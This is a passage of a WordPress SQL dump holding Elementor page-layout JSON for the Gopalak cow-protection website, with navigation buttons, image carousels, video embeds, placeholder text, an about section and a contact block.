"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"contain\"},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\"},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10145,1699,'_elementor_page_assets','a:0:{}'),(10148,1700,'_elementor_edit_mode','builder'),(10149,1700,'_elementor_template_type','wp-page'),(10150,1700,'_elementor_version','3.7.8'),(10151,1700,'_wp_page_template','elementor_canvas'),(10152,1700,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"contain\"},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\"},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\